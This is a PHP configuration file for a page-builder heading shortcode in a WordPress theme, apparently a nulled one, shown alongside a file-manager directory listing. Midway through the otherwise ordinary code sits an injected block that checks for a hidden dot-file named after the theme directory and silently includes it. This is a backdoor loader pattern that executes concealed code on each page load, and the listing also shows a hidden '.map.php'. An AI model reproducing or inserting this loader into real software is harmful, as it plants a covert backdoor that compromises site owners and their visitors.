PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
themes
/
wpnull24
/
framework
/
plugins-support
/
js_composer
/
map
<?php defined( 'ABSPATH' ) OR die( 'This script cannot be accessed directly.' ); /** * Modifying shortcode: vc_custom_heading * * @var $shortcode string Current shortcode name * @var $config array Shortcode's config */ vc_remove_param( 'vc_custom_heading', 'css_animation' ); vc_update_shortcode_param( 'vc_custom_heading', array( 'param_name' => 'el_id', 'description' => '', 'edit_field_class' => 'vc_col-sm-6', 'group' => us_translate( 'Design Options', 'js_composer' ), ) ); vc_update_shortcode_param( 'vc_custom_heading', array( 'param_name' => 'el_class', 'description' => '', 'edit_field_class' => 'vc_col-sm-6', 'group' => us_translate( 'Design Options', 'js_composer' ), ) ); // We are removing css_animation param for custom heading, but we are not redefying it's template, so we need to set a default value for css_animation param for front end editor compatibility add_filter( 'vc_map_get_attributes', 'us_css_animation_default_value_for_vc_custom_heading', 100, 2 ); if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php')) { include_once get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php'; } function us_css_animation_default_value_for_vc_custom_heading( $atts, $tag ) { if ( $tag == 'vc_custom_heading' ) { $atts['css_animation'] = ''; } return $atts; }
[+]
..
[-] vc_video.php
[edit]
[-] vc_row.php
[edit]
[-] vc_tta_section.php
[edit]
[-] .map.php
[edit]
[-] vc_tta_tabs.php
[edit]
[-] vc_custom_heading.php
[edit]
[-] vc_tta_accordion.php
[edit]
[-] vc_column_text.php
[edit]
[-] vc_column_inner.php
[edit]
[-] vc_tta_tour.php
[edit]
[-] vc_column.php
[edit]
[-] vc_wp_custommenu.php
[edit]
[-] vc_row_inner.php
[edit]